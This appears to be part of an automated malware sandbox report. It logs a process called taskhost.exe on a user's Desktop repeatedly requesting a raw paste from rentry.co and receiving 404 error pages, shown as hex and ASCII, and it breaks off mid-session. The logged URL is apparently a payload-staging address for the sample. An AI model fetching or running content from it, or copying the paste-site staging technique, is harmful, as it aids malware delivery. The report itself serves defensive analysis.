                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rap4EozJcJZIuBQVNuQF6ZlXBSeiyDL%2FOSH1QjFy6QTysydstwxK%2FosnLCDIj%2B2cjyACkVZdnwcGi2lIuHZsheS2EEERVBa1iqebqwQ2Z2BI2oToW%2B6r%2BzjRkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563d469f71a0b-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2190&min_rtt=1932&rtt_var=909&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1511387&cwnd=249&unsent_bytes=0&cid=69bd5b710199f618&ts=574&x=0"
                                                              2024-12-13 10:49:52 UTC496INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:52 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://r
                                                              2024-12-13 10:49:52 UTC1369INData Raw: 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75
                                                              Data Ascii: .matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribu
                                                              2024-12-13 10:49:52 UTC1226INData Raw: 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20
                                                              Data Ascii: mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.749899104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:56 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:57 UTC867INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:57 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQE3rvNcOEy1fYggusv6moikNKFHIH8whOC71ke7HyjlvAZJrGcvpzIuIVpQjVWbpfi6YSP%2FKCd%2BFTp8mzQKxOU6GmFHiWdWHSzyinmYRizVHKm4u0di8O7n6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563f26d4d4343-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1696&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1662870&cwnd=244&unsent_bytes=0&cid=3686793b86563647&ts=815&x=0"
                                                              2024-12-13 10:49:57 UTC502INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:57 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:49:57 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:49:57 UTC1219INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:57 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                              Data Ascii: 1
                                                              2024-12-13 10:49:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.749914104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:01 UTC47OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              2024-12-13 10:50:02 UTC867INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:02 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0UUCiFk7O5ndHw%2BlWWNDni8M4LHu7boKi7kxaQqHiRwtcZJB%2BFnYeLb503gOw38NIL1Es8MporO2qFeAUipVxOvnWl5vdwH9YYaVlJEtbVtQJKN5J33Lk6UkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f156411e9674277-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1554&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1789215&cwnd=191&unsent_bytes=0&cid=8e20a23e1f332c7f&ts=830&x=0"
                                                              2024-12-13 10:50:02 UTC502INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:02 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:50:02 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:50:02 UTC1220INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.749926104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:06 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:50:06 UTC867INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:06 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CFKKMVz4bSOrNRs%2FmzvgSmPPJEL6XVHIMmMHisHQhMpkc9teMFf%2BHu5S8ZvomhsA4sbeXHNFP7QfF06ocHmRbB63KjAMeueo8aIfrXcfLb6617XVTqfhRxjyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f15642f98c84332-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1723&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1640449&cwnd=113&unsent_bytes=0&cid=b3df73c5d50b549e&ts=591&x=0"
                                                              2024-12-13 10:50:06 UTC502INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:06 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:50:06 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:50:06 UTC1220INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.749937104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:10 UTC47OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              2024-12-13 10:50:11 UTC871INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhQwP1TvntwpwWtpbh2DORkRDj20wCv4AJa8J%2FthvkBW14z8X%2Fr8%2BP%2F3wGKXBBT5YWfwcih5X6mr9meOiP6iErTPnsgFHQGAKO2U2iPtWMECOLzMqKzL6jnt6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
